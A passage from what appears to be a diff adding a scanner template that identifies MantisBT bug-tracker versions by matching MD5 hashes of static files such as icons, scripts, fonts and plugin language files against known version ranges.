1.2.0 - 1.3.20 + dsl: + - "(\"8abfc1459e47d4740d51ffda5aa15db9\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"b468d7b908c65221d28ab60602aa8df4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/unread.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"844092dc87a57454b4340151ce34eab1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_low_1.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"d48d3b4cbb6eaff8d67a92d3243543e5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/delete.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"99cbf496a1b02408c433caf370135070\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"77dced4439c1dff30e11115c3ed5eb05\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/overdue.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"0177c5c4700cb9b15b1be97d857f1f07\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_space.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"fc94fb0c3ed8a8f909dbc7630a0987ff\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/synthgraph.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"6d514201e6a3b228d03db5c225b94e13\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/notice.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"dbea94265feab792f2e6f40fa59a8840\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/synthese.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"d8e2fe21511633ee17cc24dc1cc32e1a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_2.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"5ad19e3fd60a8dc8fff09b4e2a389ca8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/up.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"c4b122aa0ac4d26711015e1bad776711\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ok.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"c45416c024be84848dfb616e3b4298d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/blank.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"a5335c41b20b47e0044ff3e51b60db9c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rss.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"0f895c0709b7938a8aaeb72e61471cad\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_3.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"a488f63cc6a3f833f757fd6550b4c97a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/clock.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"f1cabcee8d06aecc2dd8a9dd5b43549e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_low_2.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"511695b74ff1aee9a7de872bd5529d2b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"6b2f02f1cb05b5a53aafdd28a32346e9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"c07f306a89a307100e0f24e053883097\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"4c50139975d4ceb05733c94facd25563\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"a58a825257d7c8ba920dc88dc42caf24\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jquery-1.12.4.min.js" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"4f252523d4af0b478c810c2547a63e19\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/tables.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"5d0f9078d5f22f2f77f70b275529e907\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/jquery-ui-1.11.4.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"840cca94d5e33faf324bcd4988fa8401\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"26812a28850395f8f865be4893fb20c7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"b3f9d132c575a58198e878c2897dbca6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-extra.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"63e17edddf7f976af471b5012358a7ee\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-elements.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"34bc28eacea277ad3709547329279c04\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"f9b915337650a13583b5d29d30464f99\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/jquery-ui-1.11.4.min.js" + + matchers: + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"d935d506ae9c8dd9e0f96706fbb91f65\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-extra.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"828a94f288ef752e46b9631fc623e15e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/ace-elements.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"90ebc56086ca9da6c64fb7f82c8da2d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/calendar-blue.css" + + matchers: + - type: dsl + name: 1.2.0 - 2.2.4 + dsl: + - "(\"7c561519a1cf3a882e27d1b9814888d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/soap.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"c8dbf5487394d194770781e3410f400d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-datetimepicker-4.17.43.min.css" + + matchers: + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"159e6f21fa8d971062f2a0483ddbb2b8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-datetimepicker-4.17.43.min.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"852fcbef76bc3e57db1b390560f9130e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/mantis_offline.php.sample" + + matchers: + - type: dsl + name: 1.2.0 - 2.24.3 + dsl: + - "(\"4118daa164bcad37c317a6efc038cf1c\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"5918d97dd2c8e98ac3a595f124a44a4c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/README" + + matchers: + - type: dsl + name: 1.3.0 - 2.18.1 + dsl: + - "(\"05daf17f99ba016bf0bbd7d84267c122\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0082ade8c4c52cc5397baf423805e942\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/scripts/travis_script.sh" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"7551b29afe1b149c484d65cd44436c6a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/README" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"92a7a9c70c8956c3fbf930d4d8e59ac7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/readme.md" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"808f403a9a96b9eb35aedc1ade02f6c4\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"0e211003845b252d1f2a70d1b0384825\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.svg" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"89889688147bd7575d6327160d64e760\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"fa2772327f55d8198301fdb8bcfc8158\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.eot" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"25a32416abee198dd821b0b17a198a8f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.svg" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"d7c639084f684d66a1bc66855d193ed8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.eot" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f4769f9bdb7466be65088239c12046d1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.woff2" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"448c34a56d699c29117adc64c43affeb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"7c5d9f078bea8c1fc0b21a764b832138\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"c8ddf1e5e5bf3682bc7bebf30f394148\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.ttf" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"1dc35d25e61d819a9c357074014867ab\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/glyphicons-halflings-regular.ttf" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"e18bbf611f2a2e43afc071aa2f4e1512\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/fontawesome-webfont.woff2" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"e6cf7c6ec7c2d6f670ae9d762604cb0b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"3eb14f3838ada50e10f062a895c3b9cf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_english.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d62051e62da0ab89f7413443af730ff1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 1.3.2 - 2.24.3 + dsl: + - "(\"30008f612550c2db9958e676df2be8d6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"d2045dd77cd2fd570c3e994cabe74eb9\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"ad16a986c7a469f6476bc14800500e5c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"02fc3fcda16bc2e86770c2eb3dbaeb9e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"1c4ba0fc240258d025b1b1ffa7389db6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9f931332f70eb2f3650a316dbb010614\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"fa0e8f0390cd557d545d080850987094\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_arabicegyptianspoken.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"3c8150a1f95bfcee0845f39f24a46ac6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"007cfee14b98337df059257345c7a65f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_pms.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"a33954ff3048ef824b3fc34b4a194d69\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_zh-cn.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - "(\"8ca3abd71f703988db8ffadcd8754c0e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_id.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"ac923215f26875ba9fb7b11636fa5799\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"5d17eed14bc68236422ddf6ece008297\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"53570598b9ac90ffb1ab80153396a821\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"1c7ae0660e2f3fa68ce904896e5ab920\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ea80399d9d556c771d365790fcc534b4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1c72b519de1423ebc139dedf22bafe28\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"4defb6984419ce2b4360a0e146a7db08\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4f5d1196b59af7a18111d19ba3c47e13\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c625b3af91a110dd4e0fd2341051ad02\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"1c63cb1335fd4d77b5ee213617bbcf3a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"335be658540f525056006176728d1e92\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ccc34c9a34862730fcf63f5e5473142f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"2adde47e75a31685fc926067c8251ce7\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"e646fd77c3f55f759ff5163b3509bf22\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"4aaa48cde03645b19aac4ba64b14f4b4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 1.3.2 - 2.24.3 + dsl: + - "(\"f3e3bf65368847e9070d8824c37f2ad7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"64869f07bca9ab315359a2030b1ff574\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b425dbca5b9e6ebbf893eb16bf03196a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8e6e8a0b14016484a612e710261812ae\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"031b1c792bab95ab6b9e2a1c9cdbabe4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"daf022504fea54506a55b792b8605f89\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"4eea16194dae629fea551de05532bb25\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"0ed2e7b8ab20f436ea17cb91d4bbdae6\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"3f158fba60d4cd1394713a88c74fe21e\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"8a18dbd395ea04cc607f937b5e47a70d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_diq.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"6068377b3b4fd7bd5af883f0ac5cc2d9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.24.3 + dsl: + - "(\"f8cd0698ae1f9172c94670613ae50b44\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"93f5f1131b7903b0f47888307bb08919\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"b2fb0fffa96af46682e2b826bb62e9df\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"d269924c3522249c7bd48f4e4bebef07\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"683b502ec6955e8be00768bd71122d16\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"12b0268e35ebf2211c5d06ab532620f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/mantis.dtd" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"26602ec447a7263cc99bcb05f715f487\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"eb716a68e78c590a2b1150815db92e41\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Web.config" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"1dc7932b270a5371ac7a4ffde778787e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ms.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"445c74bf0c8b1f999f981eaa62f52fda\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 1.3.2 - 2.24.3 + dsl: + - "(\"f7230c71fdb9b5b824cd19a385c3cfa8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"a24f6b8334165c6e3482805513ebad0c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"e95d12f64844cc4b3bb88784539ad3af\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"644e6dccb9e4c8a02c521959fbbc92fc\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"fc6a4f05398282e58e3258fdb908e561\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"88153b9431dfe3855073267e151b73a5\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"8c2ed1c54dcecb0b08156644c36edca5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_tagalog.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"69c2b8036651e4c4242209beb4586091\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"b07a100c9c0a00e44aa8580722039cf3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"aa6354c45d5796055dcc6ce0f7980d83\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"21f45a62b925f8b4df7dfaa334fbfc10\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"19a6f96619c3e7e3751135d4a030dd1f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"4a3eaa2551d175e33150dea750b86fa0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"fc338b573a25f2163eb10727f21cc2c9\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"68d89f77f7a2b3f8312eea568d90fe07\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"239b762d91693f816bad6ed901ccc20d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8f8e5d4229a63748bef980893b16975f\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"64c0ca1b4f1973c2ead40bc5212d9304\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"864b366cc79b9940250501e66cb0c150\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5380518115f093ea1e7fab79cfbbeafe\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"e1917a91b3eb3851d9afc52b14303a5f\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"0b79f6258f6636eefaef25fd98a671de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"43bcd4bf29c62f2dca0cc9f498ef8172\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"b4c432955dc53cdd35cc92b05764a8e3\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"dee25201ead8fe9c5d28d69eb9d4a824\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"01b9f26150a3cd9ee7c19404ebec824e\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"67cb1a66ddbb3ac863935b7c4f45192c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b38376c3d20eb656f9ca558dcdd35977\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"782b865edf778959812b99e19f905d43\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"71999f7ccc3ecaab1a695962cebf4f03\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"3db8ee56d0c6e6b7a1a0a00565ef3245\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"b478f59ecc5b3ce963066287b7d350b0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"44868ac13f06a1621464c9bd7bde1036\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8953cb10a829990c4de6dc9d36d1df48\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"caf7bf28e3e8c65c1818afa7599d9cc4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6aab61391d9e6ec355956b60e56244a8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"68bc2f0f4a1d221ca46d3cfce4fbbfe9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b383b9d17ac4326d80c6aa51909a34fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4265c738357e94059b6676a0c42d6650\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"6341598a5b546a5e9d41a2a21380febc\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"2126de2ee68d0aa3f3fd57d0a0816d08\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1a7f4f21dc42998d909c5293bf7c2e93\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a63253ee214268c7e5a1a80a264f060a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"9ff53b2a76bfcfc6e59d6dd5df30cd11\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"72e5acf9e09045f5b7b0a700aa1c360a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_pms.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.11.1 + dsl: + - "(\"52f6126718bf93470f44a6518d1f3161\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_swissgerman.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"020c5cffeaffc5084c25e1a6a491c4fe\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"5a2bbe74033a14f5485fdfb8c5936e21\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9f8ef2b7187d943ce45db2a23275e193\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"8f941aa5238e91600e22f35bad871482\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5b95eb1ed08729dc383d2beb35046a87\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d75b684c0ba2dfa3b6227157dad2a853\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"36b1717d2936c3c90ebdf9eeab5a3e87\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c40c3c35ee8e5475179cedb658299b13\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"09dbd7be38cb46e0b6f17bb82b386c43\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"d67b7d1ca20a0d33f32b6bd0e2a606be\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"a228ab9856044f0d5f5e30c7d809f3ba\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"140e5bff40e4a83c35bab196dcc44b12\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"3e99ca347d3f8fab044dae5e0bc0e02e\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"72ba3119e03223954d8644bf16fcf8a8\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"f65e8d036fd03c4a8204b6a68a15f4bd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_zh-cn.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.24.3 + dsl: + - 